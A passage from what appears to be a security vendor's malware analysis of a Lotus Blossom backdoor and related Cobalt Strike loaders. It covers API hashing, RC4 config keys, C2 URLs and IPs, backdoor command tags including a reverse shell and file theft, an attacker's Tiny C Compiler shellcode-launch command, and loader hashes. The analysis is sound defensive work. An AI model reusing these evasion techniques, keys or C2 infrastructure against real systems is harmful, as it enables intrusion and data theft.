</span><span><span data-type="inlineCode"><strong>wininet.dll</strong></span></span><span>,</span><span><strong> </strong></span><span><span data-type="inlineCode"><strong>ole32.dll</strong></span></span><span> and </span><span><span data-type="inlineCode"><strong>shell32.dll</strong></span></span><span>.</span></p><p><span>Names of targeted DLLs are constructed on the run, using two separate subroutines. These two subroutines implement a custom, position-dependent character obfuscation scheme. Each character is transformed using a combination of bit rotations, conditional XOR operations, and index-based arithmetic, ensuring that identical characters encrypt differently depending on their position. The second routine reverses this process at runtime, reconstructing the original plaintext string just before it is used. The purpose of these two functions is not only to conceal strings, but also to intentionally complicate static analysis and hinder signature-based detection.</span></p><p><span>After the DLL name is reconstructed, the Main module implements another, more sophisticated API hashing routine.</span></p><h3>API hashing subroutine</h3><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt47a4d3aa70f2644b/6980beba4551a4a087ba56d2/lotus-blossom-API-hashing-diagram.jpg" alt="lotus-blossom-API-hashing-diagram.jpg" caption="Figure 4: API hashing diagram" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-API-hashing-diagram.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt47a4d3aa70f2644b/6980beba4551a4a087ba56d2/lotus-blossom-API-hashing-diagram.jpg" data-sys-asset-uid="blt47a4d3aa70f2644b" data-sys-asset-filename="lotus-blossom-API-hashing-diagram.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 4: API hashing diagram" data-sys-asset-alt="lotus-blossom-API-hashing-diagram.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: API hashing diagram</figcaption></div></figure><p>⠀</p><p><span>The first difference between this and the API hashing routine used by the loader is that this subroutine accepts only a single argument: the hash of the target API. To obtain the DLL handle, the malware walks the PEB to reach the </span><span><span data-type="inlineCode"><strong>InMemoryOrderModuleList</strong></span></span><span>, then parses each module’s export table, skipping the main executable, until it resolves the desired API. Instead of relying on common hashing algorithms, the routine employs multi-stage arithmetic mixing with constants of </span><span><span data-type="inlineCode"><strong>MurmurHash-style finalization</strong></span></span><span>. API names are processed in 4-byte blocks using multiple rotation and multiplication steps, followed by a final diffusion phase before comparison with the supplied hash. This design significantly complicates static recovery of resolved APIs and reduces the effectiveness of traditional signature-based detection. As a fallback, the resolver supports direct resolution via </span><span><span data-type="inlineCode"><strong>GetProcAddress</strong></span></span><span> if the target hash is not found through the hashing method. The pointer to </span><span><span data-type="inlineCode"><strong>GetProcAddress</strong></span></span><span> is obtained earlier during the “main module preparation” stage.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta01bac2b11922a6f/6980bf0473b29a313cc2cac2/lotus-blossom-API-hashing-internals.png" alt="lotus-blossom-API-hashing-internals.png" caption="Figure 5: API hashing internals " class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-API-hashing-internals.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta01bac2b11922a6f/6980bf0473b29a313cc2cac2/lotus-blossom-API-hashing-internals.png" data-sys-asset-uid="blta01bac2b11922a6f" data-sys-asset-filename="lotus-blossom-API-hashing-internals.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5: API hashing internals" data-sys-asset-alt="lotus-blossom-API-hashing-internals.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 5: API hashing internals</figcaption></div></figure><h3>Config decryption</h3><p><span>The next step in the malware’s execution is to decrypt the configuration. Encrypted configuration is stored in the </span><span><em>BluetoothService</em></span><span> file at offset 0x30808 with the size of 0x980. Algorithm for the decryption is </span><span><span data-type="inlineCode"><strong>RC4</strong></span></span><span><strong> </strong></span><span>with the key </span><span><span data-type="inlineCode"><strong>qwhvb^435h&amp;*7</strong></span></span><span>. This revealed the following information:</span></p><ul><li><span><span data-type="inlineCode"><strong>Command and Control (C2) url</strong></span></span><span>: </span><span><span data-type="inlineCode"><strong>https://api.skycloudcenter.com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821</strong></span></span></li><li><span><span data-type="inlineCode"><strong>Name of the module</strong></span></span><span>: </span><span><span data-type="inlineCode"><strong>BluetoothService</strong></span></span></li><li><span><span data-type="inlineCode"><strong>User agent</strong></span></span><span>: </span><span><span data-type="inlineCode"><strong>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4044.92 Safari/537.36</strong></span></span></li></ul><p><span>Decrypted configuration doesn’t give much useful information besides the C2. The name of the module is too generic and the user agent belongs to Google Chrome browser. The URL resolves to </span><span><span data-type="inlineCode"><strong>61.4.102.97</strong></span></span><span>, IP address based in</span><span><strong> </strong></span><span><span data-type="inlineCode"><strong>Malaysia</strong></span></span><span>. At the time of the writing of this blog, no other file has been seen to communicate with this IP and URL.</span></p><h4>Persistence and Command-Line Arguments</h4><p><span>To determine the next course of action, malware checks command line arguments highlighted in Table 1 and chooses one of four potential paths - if the amount of the command-line arguments is greater than two, the process will exit. If there is no additional argument, persistence is set up primarily via service creation or registry as a fall back mechanism.</span></p><p><span>See Table 2 below:</span></p><table><colgroup data-width="750"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Argument</strong></span></p></td><td><p><span><strong>Mode</strong></span></p></td><td><p><span><strong>Action</strong></span></p></td></tr><tr><td><p><span><strong>(None)</strong></span></p></td><td><p><span>Installation</span></p></td><td><p><span>Installs persistence (Service or Registry) pointing to binary with </span><span data-type="inlineCode">-i</span><span> flag, then terminates.</span></p></td></tr><tr><td><p><span data-type="inlineCode"><strong>-i</strong></span></p></td><td><p><span>Launcher</span></p></td><td><p><span>Spawns a new instance of itself with the </span><span data-type="inlineCode">-k</span><span> flag via </span><span data-type="inlineCode">ShellExecuteA</span><span>, then terminates.</span></p></td></tr><tr><td><p><span data-type="inlineCode"><strong>-k</strong></span></p></td><td><p><span>Payload</span></p></td><td><p><span>Skips installation checks and executes the main malicious logic (C2 &amp; Shellcode).</span></p></td></tr></tbody></table><p>⠀</p><p><span>With the expected arguments present, the malware proceeds to its primary functionality - to gather information about the infected asset and initiate the communication with C2.</span></p><h3>Information gathering and C2 communication</h3><p><span>A mutex </span><span><span data-type="inlineCode"><strong>Global\\Jdhfv_1.0.1 </strong></span></span><span>is registered to enforce single instance execution on the host. If it already exists, malware is terminated. If the check is clear, information gathering begins by querying for the following : current time, installed AVs, OS version, user name and computer name. Next, computer name, user name, OS version and string </span><span><span data-type="inlineCode"><strong>1.01</strong></span></span><span><strong> </strong></span><span>are concatenated and the data are hashed using </span><span><span data-type="inlineCode"><strong>FNV-1A</strong></span></span><span>. This value is later turned into its decimal ascii representation and used most likely as a unique identifier of the infected host. </span></p><p><span>Final buffer uses a dot as delimiter and follows this pattern: </span></p><p>⠀</p><pre language="cpp">&lt;UniqueID&gt;.&lt;ComputerName&gt;.&lt;UserName&gt;.&lt;OSVersion&gt;.&lt;127.0.0.1&gt;.&lt;AVs&gt;.&lt;DateAndTime&gt;</pre><p>⠀</p><p><span>The last piece of information added to the beginning of the buffer is a string </span><span><span data-type="inlineCode"><strong>4Q</strong></span></span><span>. The buffer is then </span><span><span data-type="inlineCode"><strong>RC4</strong></span></span><span> encrypted with the key </span><span><span data-type="inlineCode"><strong>vAuig34%^325hGV</strong></span></span><span>.</span></p><p><span>Following data encryption, the malware establishes an internet connection using previously mentioned user agent and C2 </span><span><strong>api.skycloudcenter.com </strong></span><span>over port </span><span><strong>443</strong></span><span>. Data is then transferred via </span><span><span data-type="inlineCode"><strong>HttpSendRequestA</strong></span></span><span><strong> </strong></span><span>using the </span><span><span data-type="inlineCode"><strong>POST</strong></span></span><span><strong> </strong></span><span>method. Response from the server is then read to a temporary buffer which is later decrypted using the same key </span><span><span data-type="inlineCode"><strong>vAuig34%^325hGV</strong></span></span><span>.</span></p><h4>Response and command processing</h4><p><span><em><strong>Note:</strong></em></span><span> C2  server was already offline during the initial analysis, preventing recovery of any network data. As a result, and due to the complexity of the malware, parts of the following analysis may contain minor inaccuracies.</span></p><p><span>The response from the C2 undergoes multiple checks before further processing. First, the HTTP response code is compared against the hardcoded value </span><span><span data-type="inlineCode"><strong>200</strong></span></span><span><strong> </strong></span><span>(0xC8),</span><span><strong> </strong></span><span>indicating a successful request, followed by a validation of the associated WinInet handle to ensure no error occurred. The malware then verifies the integrity of the received payload and execution proceeds only if at least one valid structure is detected. Next, malware looks into the response data for a small tag to determine what to do next. Tag is used as a condition for a switch statement with 16 possible cases. The default case will simply set up a flag to </span><span><span data-type="inlineCode"><strong>TRUE</strong></span></span><span>. Setting up this flag will result in completely jumping out of the switch. Other switch cases includes following options:</span></p><p>⠀</p><table><tbody><tr><td><p><span><strong>Char representation</strong></span></p></td><td><p><span><strong>Hex representation</strong></span></p></td><td><p><span><strong>Purpose</strong></span></p></td></tr><tr><td><p><span><strong>4T</strong></span></p></td><td><p><span><strong>0x3454</strong></span></p></td><td><p><span>Spawn interactive shell</span></p></td></tr><tr><td><p><span><strong>4U</strong></span></p></td><td><p><span><strong>0x3455</strong></span></p></td><td><p><span>Send ‘OK’ to C2</span></p></td></tr><tr><td><p><span><strong>4V</strong></span></p></td><td><p><span><strong>0x3456</strong></span></p></td><td><p><span>Create process</span></p></td></tr><tr><td><p><span><strong>4W</strong></span></p></td><td><p><span><strong>0x3457</strong></span></p></td><td><p><span>Write file to disk</span></p></td></tr><tr><td><p><span><strong>4X</strong></span></p></td><td><p><span><strong>0x3458</strong></span></p></td><td><p><span>Write chunk to open file</span></p></td></tr><tr><td><p><span><strong>4Y</strong></span></p></td><td><p><span><strong>0x3459</strong></span></p></td><td><p><span>Read &amp; send data</span></p></td></tr><tr><td><p><span><strong>4Z</strong></span></p></td><td><p><span><strong>0x345A</strong></span></p></td><td><p><span>Break from switch</span></p></td></tr><tr><td><p><span><strong>4\\</strong></span></p></td><td><p><span><strong>0x345C</strong></span></p></td><td><p><span>Uninstall / Clean up</span></p></td></tr><tr><td><p><span><strong>4]</strong></span></p></td><td><p><span><strong>0x345D</strong></span></p></td><td><p><span>Sleep</span></p></td></tr><tr><td><p><span><strong>4_</strong></span></p></td><td><p><span><strong>0x345F</strong></span></p></td><td><p><span>Get info about logical drives</span></p></td></tr><tr><td><p><span><strong>4`</strong></span></p></td><td><p><span><strong>0x3460</strong></span></p></td><td><p><span>Enumerate files information</span></p></td></tr><tr><td><p><span><strong>4a</strong></span></p></td><td><p><span><strong>0x3661</strong></span></p></td><td><p><span>Delete file </span></p></td></tr><tr><td><p><span><strong>4b</strong></span></p></td><td><p><span><strong>0x3662</strong></span></p></td><td><p><span>Create directory</span></p></td></tr><tr><td><p><span><strong>4c</strong></span></p></td><td><p><span><strong>0x3463</strong></span></p></td><td><p><span>Get file from C2</span></p></td></tr><tr><td><p><span><strong>4d</strong></span></p></td><td><p><span><strong>0x3464</strong></span></p></td><td><p><span>Send file to C2</span></p></td></tr></tbody></table><p>⠀</p><p><span><span data-type="inlineCode"><strong>4T</strong></span></span><span> - The malware implements a fully interactive </span><span><span data-type="inlineCode"><strong>cmd.exe reverse shell</strong></span></span><span> using redirected pipes. Incoming commands from the C2 are converted from </span><span><span data-type="inlineCode"><strong>UTF‑8</strong></span></span><span> to the system </span><span><span data-type="inlineCode"><strong>OEM</strong></span></span><span> code page before being written to the shell’s standard input, while a dedicated thread continuously reads shell output, converts it from OEM encoding to UTF‑8 using </span><span><span data-type="inlineCode"><strong>GetOEMCP</strong></span></span><span> API, and forwards the result back to the C2.</span></p><p><span><span data-type="inlineCode"><strong>4V</strong></span></span><span><strong> </strong></span><span>- This option allows remote process execution by invoking </span><span><span data-type="inlineCode"><strong>CreateProcessW</strong></span></span><span> on a C2-supplied command line and relaying execution status back to the C2.</span></p><p><span><span data-type="inlineCode"><strong>4W</strong></span></span><span><strong> </strong></span><span>- This option implements a remote file write capability, parsing a structured response containing a destination path and file contents, converting encodings as necessary, </span><span><span data-type="inlineCode"><strong>writing the data to disk</strong></span></span><span>, and </span><span><span data-type="inlineCode"><strong>returning a formatted status message</strong></span></span><span> to the command-and-control server.</span></p><p><span><span data-type="inlineCode"><strong>4X</strong></span></span><span><strong> </strong></span><span>- Similar to the previous switch, it supports a remote file-write capability, allowing the C2 to drop arbitrary files on the victim system by supplying a </span><span><span data-type="inlineCode"><strong>UTF-8 filename and associated data blob</strong></span></span><span>.</span></p><p><span><span data-type="inlineCode"><strong>4Y</strong></span></span><span> - Switch implements a remote file-read capability. It opens a specified file with, retrieves its size, reads the entire contents into memory, and </span><span><span data-type="inlineCode"><strong>transmits the data back to the C2</strong></span></span><span>. </span></p><p><span><span data-type="inlineCode"><strong>4\\</strong></span></span><span><strong> </strong></span><span>- The option implements a full </span><span><span data-type="inlineCode"><strong>self-removal mechanism</strong></span></span><span>. It deletes auxiliary payload files, removes persistence artifacts from both the </span><span><span data-type="inlineCode"><strong>Windows Service registry hive</strong></span></span><span> and </span><span><span data-type="inlineCode"><strong>the Run key</strong></span></span><span>, generates and executes a temporary batch file </span><span><span data-type="inlineCode"><strong>u.bat</strong></span></span><span><strong> </strong></span><span>to delete the running executable after termination, and finally removes the batch script itself. </span></p><p><span><span data-type="inlineCode"><strong>4_</strong></span></span><span><strong> </strong></span><span>- Here malware enumerates information about logical drivers using </span><span><span data-type="inlineCode"><strong>GetLogicalDriveStringsA</strong></span></span><span> and </span><span><span data-type="inlineCode"><strong>GetDriveTypeA</strong></span></span><span><strong> </strong></span><span>APIs and sends the information back to the C2.</span></p><p><span><span data-type="inlineCode"><strong>4`</strong></span></span><span><strong> </strong></span><span>- This switch option shares similarities with previously analyzed data exfiltration function - </span><span><span data-type="inlineCode"><strong>4Y</strong></span></span><span>. However, its primary purpose differs. Instead of transmitting preexisting data, it </span><span><span data-type="inlineCode"><strong>enumerates files</strong></span></span><span> within a specified directory, </span><span><span data-type="inlineCode"><strong>collects per-file metadata</strong></span></span><span> (timestamps, size, and filename), serializes the results into a custom buffer format, and sends the aggregated listing to the C2.</span></p><p><span><span data-type="inlineCode"><strong>4a - 4b - 4c - 4d</strong></span></span><span><strong> </strong></span><span>- In the last 4 cases, malware implements a custom file transfer protocol over its C2 channel. Commands </span><span><span data-type="inlineCode"><strong>4a</strong></span></span><span> and </span><span><span data-type="inlineCode"><strong>4b</strong></span></span><span> act as control messages used to initialize file </span><span><span data-type="inlineCode"><strong>download</strong></span></span><span><strong> </strong></span><span>and </span><span><span data-type="inlineCode"><strong>upload operations</strong></span></span><span> respectively, including file paths, offsets, and size validation. Once initialized, the actual data transfer occurs in a chunked fashion using commands </span><span><span data-type="inlineCode"><strong>4c (download)</strong></span></span><span><strong> </strong></span><span>and </span><span><span data-type="inlineCode"><strong>4d (upload)</strong></span></span><span><strong>.</strong></span><span> Each chunk is wrapped in a fixed-size 40-byte response structure, validated for successful HTTP status and correct structure count before processing. Transfers continue until the C2 signals completion via a non-zero termination flag, at which point file handles and buffers are released.</span></p><h3>Additional artifacts discovered on the infected host</h3><p><span>During the initial forensics analysis of the affected asset, Rapid7’s MDR team observed execution of following command:</span></p><p>⠀</p><pre language="cpp">C:\ProgramData\USOShared\svchost.exe-nostdlib -run
C:\ProgramData\USOShared\conf.c</pre><p>⠀</p><p><span>The retrieved folder </span><span><em>“USOShared”</em></span><span><strong> </strong></span><span>from the infected asset didn’t contain svchost.exe but it contained </span><span><em>“libtcc.dll” </em></span><span>and </span><span><em>“conf.c”</em></span><span>. The hash of the binary didn’t match any known legitimate version but the command line arguments and associated </span><span><em>“libtcc.dll”</em></span><span> suggested that svchost.exe is in fact renamed </span><a href="https://github.com/phoenixthrush/Tiny-C-Compiler"><span>Tiny-C-Compiler</span></a><span>. To confirm this, we replicated the steps of the attacker successfully loaded </span><span><span data-type="inlineCode"><strong>shellcode</strong></span></span><span> from </span><span><em>“conf.c” </em></span><span>into the memory of </span><span><em>“tcc.exe”</em></span><span>, confirming our previous hypothesis.  </span><span><strong> </strong></span></p><h4><strong>Analysis of conf.c</strong></h4><p><span>The C source file contains a fixed size (836) char buffer containing shellcode bytes which is later casted to a function pointer and invoked. The shellcode is consistent with 32-bit version of </span><a href="https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm"><span>Metasploit’s block API.</span></a></p><p><span>The shellcode loads </span><span><span data-type="inlineCode"><strong>Wininet.dll</strong></span></span><span> using </span><span><span data-type="inlineCode"><strong>LoadLibraryA</strong></span></span><span>, resolves Internet-related APIs such as </span><span><span data-type="inlineCode"><strong>InternetConnectA</strong></span></span><span><strong> </strong></span><span>and </span><span><span data-type="inlineCode"><strong>HttpSendRequestA</strong></span></span><span>, and downloads a file from </span><span><span data-type="inlineCode"><strong>api.wiresguard.com/users/admin</strong></span></span><span>. The file is read into a newly allocated and execution is then transferred to the start of the 2000-byte second-stage shellcode. </span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7e5771a2056ea7bb/6980c2dca49b287b588e2770/lotus-blossom-hellcode-decryption-stub.png" alt="lotus-blossom-hellcode-decryption-stub.png" caption="Figure 6: Shellcode decryption stub" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-hellcode-decryption-stub.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7e5771a2056ea7bb/6980c2dca49b287b588e2770/lotus-blossom-hellcode-decryption-stub.png" data-sys-asset-uid="blt7e5771a2056ea7bb" data-sys-asset-filename="lotus-blossom-hellcode-decryption-stub.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 6: Shellcode decryption stub" data-sys-asset-alt="lotus-blossom-hellcode-decryption-stub.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 6: Shellcode decryption stub</figcaption></div></figure><p>⠀</p><p><span>This stub is responsible for decrypting the next payload layer and transferring execution to it. It uses a </span><span><span data-type="inlineCode"><strong>rolling XOR-based</strong></span></span><span><strong> </strong></span><span>decryption loop before jumping directly to the decrypted code.</span></p><p><span>A quick look into the decrypted buffer revealed an interesting blob with a repeated string </span><span><span data-type="inlineCode"><strong>CRAZY</strong></span></span><span>, hinting additional XORed layer, later confirmed by a quick test.  </span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfba70f268e1aa776/6980c33229b277724c63dd5f/lotus-blossom-repeated-XOR-key-CRAZY.png" alt="lotus-blossom-repeated-XOR-key-CRAZY.png" caption="Figure 7: Repeated XOR key “CRAZY”" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-repeated-XOR-key-CRAZY.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfba70f268e1aa776/6980c33229b277724c63dd5f/lotus-blossom-repeated-XOR-key-CRAZY.png" data-sys-asset-uid="bltfba70f268e1aa776" data-sys-asset-filename="lotus-blossom-repeated-XOR-key-CRAZY.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 7: Repeated XOR key “CRAZY”" data-sys-asset-alt="lotus-blossom-repeated-XOR-key-CRAZY.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 7: Repeated XOR key “CRAZY”</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7fdc600725c456fa/6980c35fe313c672d8909c1a/lotus-blossom-decrypted-configuration.png" alt="lotus-blossom-decrypted-configuration.png" caption="Figure 8: Decrypted configuration" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-decrypted-configuration.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7fdc600725c456fa/6980c35fe313c672d8909c1a/lotus-blossom-decrypted-configuration.png" data-sys-asset-uid="blt7fdc600725c456fa" data-sys-asset-filename="lotus-blossom-decrypted-configuration.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: Decrypted configuration" data-sys-asset-alt="lotus-blossom-decrypted-configuration.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 8: Decrypted configuration</figcaption></div></figure><p>⠀</p><p><span>Parsing of the decrypted configuration data confirms that retrieved shellcode is </span><span><span data-type="inlineCode"><strong>Cobalt Strike (CS) HTTPS beacon</strong></span></span><span><strong> </strong></span><span>with http-get </span><span><span data-type="inlineCode"><strong>api.wiresguard.com/update/v1</strong></span></span><span><strong> </strong></span><span>and http-post </span><span><span data-type="inlineCode"><strong>api.wiresguard.com/api/FileUpload/submit</strong></span></span><span> urls.</span></p><p><span>Analysis of the initial evidence revealed a consistent execution chain: a loader embedding </span><span><span data-type="inlineCode"><strong>Metasploit block_api</strong></span></span><span> shellcode that downloads a </span><span><span data-type="inlineCode"><strong>Cobalt Strike beacon</strong></span></span><span>. The unique decryption stub and configuration XOR key </span><span><span data-type="inlineCode"><strong>CRAZY</strong></span></span><span> allowed us to pivot into an external hunt, uncovering additional loader variants.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt989ba6e7f4c51324/6980c3e773b29add1cc2cb00/lotus-blossom-Execution-flow.png" alt="lotus-blossom-Execution-flow.png" caption="Figure 9: Execution flow followed by conf.c and other loaders" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-Execution-flow.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt989ba6e7f4c51324/6980c3e773b29add1cc2cb00/lotus-blossom-Execution-flow.png" data-sys-asset-uid="blt989ba6e7f4c51324" data-sys-asset-filename="lotus-blossom-Execution-flow.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Execution flow followed by conf.c and other loaders" data-sys-asset-alt="lotus-blossom-Execution-flow.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 9: Execution flow followed by conf.c and other loaders</figcaption></div></figure><h4>Variation of loaders and shellcode</h4><p><span>In the last year, four similar files were uploaded to public repositories.</span></p><p>⠀</p><table><tbody><tr><td><p><br></p></td><td><p><span><strong>Loader 1</strong></span></p></td><td><p><span><strong>Loader 2</strong></span></p></td><td><p><span><strong>Loader 3</strong></span></p></td><td><p><span><strong>Loader 4 </strong></span></p></td></tr><tr><td><p><span><strong>Loader </strong></span></p><p><span><strong>SHA-256</strong></span></p></td><td><p><span>0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd</span></p></td><td><p><span>e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda</span></p></td><td><p><span>b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3</span></p></td><td><p><span>fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a</span></p></td></tr><tr><td><p><span><strong>Shellcode SHA-256</strong></span></p></td><td><p><span>4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8</span></p></td><td><p><span>078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5</span></p></td><td><p><span>7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd</span></p></td><td><p><span>7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd</span></p></td></tr><tr><td><p><span><strong>User Agent</strong></span></p></td><td><p><span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36</span></p><p></p></td><td><p><span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36</span></p><p></p></td><td><p><span> Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36</span></p><p></p></td><td><p><span> Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36</span></p></td></tr><tr><td><p><span><strong>URL hosting CS beacon</strong></span></p></td><td><p><span>http://59.110.7.32:8880/uffhxpSy</span></p></td><td><p><span>http://124.222.137.114:9999/3yZR31VK</span></p></td><td><p><span>https://api.wiresguard.com/users/system</span></p></td><td><p><span>https://api.wiresguard.com/users/system</span></p></td></tr><tr><td><p><span><strong>CS http-get URL</strong></span></p></td><td><p><span>http:// 59.110.7.32:8880/api/getBasicInfo/v1</span></p></td><td><p><span>http://124.222.137.114:9999/api/updateStatus/v1</span></p></td><td><p><span>https://api.wiresguard.com/api/getInfo/v1</span></p></td><td><p><span>https://api.wiresguard.com/api/getInfo/v1</span></p></td></tr><tr><td><p><span><strong>CS http-post URL</strong></span></p></td><td><p><span>http:// 59.110.7.32:8880/api/Metadata/submit</span></p></td><td><p><span>http://124.222.137.114:9999/api/Info/submit</span></p></td><td><p><span>https://api.wiresguard.com/api/Info/submit</span></p></td><td><p><span>https://api.wiresguard.com/api/Info/submit</span></p></td></tr></tbody></table><p>⠀</p><p><span>From all the loaders we analyzed, </span><span><span data-type="inlineCode"><strong>Loader 3</strong></span></span><span><strong> </strong></span><span>piqued our interest for three reasons - shellcode </span><span><span data-type="inlineCode"><strong>encryption</strong></span></span><span> technique, </span><span><span data-type="inlineCode"><strong>execution</strong></span></span><span><strong> </strong></span><span>and </span><span><span data-type="inlineCode"><strong>almost identical C2</strong></span></span><span><strong> </strong></span><span>to beacon that was found on the infected asset . All the previous samples used a pretty common technique to execute the shellcode - decrypt embedded shellcode in user space, change the protection of memory region  to executable state and invoke decrypted code via </span><span><span data-type="inlineCode"><strong>CreateThread</strong></span></span><span><strong> </strong></span><span>/ </span><span><span data-type="inlineCode"><strong>CreateRemoteThread</strong></span></span><span>, Loader 3 (original name </span><span><em>“ConsoleApplication2.exe”</em></span><span>) violates this approach. </span></p><h4>Analysis of Loader 3 - ConsoleApplication2.exe </h4><p><span>At the first glance, the logic of the sample is straightforward Load the DLL </span><span><span data-type="inlineCode"><strong>clipc.dll</strong></span></span><span>, overwrite first 0x490 bytes, change the protection to </span><span><span data-type="inlineCode"><strong>PAGE_EXECUTE_READ</strong></span></span><span> (0x20), and then invoke </span><span><span data-type="inlineCode"><strong>NtQuerySystemInformation</strong></span></span><span><strong>. </strong></span><span>Two interesting notes to highlight here - bytes copied into the memory region of clipc.dll are not valid shellcode and </span><span><span data-type="inlineCode"><strong>NtquerySystemInformation</strong></span></span><span> is used to “</span><a href="https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntquerysysteminformation"><span>Retrieve the specified system information</span></a><span>”, not to execute code.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltad7ccddfd03069d8/6980c4cca05d7d5b4d9ac74d/lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" alt="lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" caption="Figure 10: Snippet from ConsoleApplication2.exe" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltad7ccddfd03069d8/6980c4cca05d7d5b4d9ac74d/lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" data-sys-asset-uid="bltad7ccddfd03069d8" data-sys-asset-filename="lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: Snippet from ConsoleApplication2.exe" data-sys-asset-alt="lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 10: Snippet from ConsoleApplication2.exe</figcaption></div></figure><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5dfccfc7e3596d19/6980c4cccaf3ac7371ce0c06/lotus-blossom-data-copied-clipc-dll.png" alt="lotus-blossom-data-copied-clipc-dll.png" caption="Figure 11: Data copied into clipc.dll" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-data-copied-clipc-dll.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5dfccfc7e3596d19/6980c4cccaf3ac7371ce0c06/lotus-blossom-data-copied-clipc-dll.png" data-sys-asset-uid="blt5dfccfc7e3596d19" data-sys-asset-filename="lotus-blossom-data-copied-clipc-dll.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 11: Data copied into clipc.dll" data-sys-asset-alt="lotus-blossom-data-copied-clipc-dll.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 11: Data copied into clipc.dll</figcaption></div></figure><p>⠀</p><p><span>According to the official documentation, the first parameter of NtQuerySystemInformation is of type </span><span><span data-type="inlineCode"><strong>SYSTEM_INFORMATION_CLASS</strong></span></span><span><strong> </strong></span><span>which specifies the category of system information to be queried.  During static analysis in </span><span><strong>IDA Pro</strong></span><span>, this parameter was initially identified as </span><span><span data-type="inlineCode"><strong>SystemExtendedProcessInformation|0x80</strong></span></span><span><strong> </strong></span><span>but looking for this value in MSDN and other public references didn’t provide any explanation on how the execution was achieved. But, searching for the original value passed to the function </span><span><span data-type="inlineCode"><strong>(0xB9)</strong></span></span><span><strong> </strong></span><span>uncovered something interesting. The following </span><a href="https://downwithup.github.io/blog/post/2023/04/23/post9.html"><span>blog</span></a><span> by DownWithUp covers Microsoft Warbird, which could be described as an internal </span><a href="https://cirosec.de/en/news/abusing-microsoft-warbird-for-shellcode-execution/"><span>code protection and obfuscation framework </span></a><span><strong>. 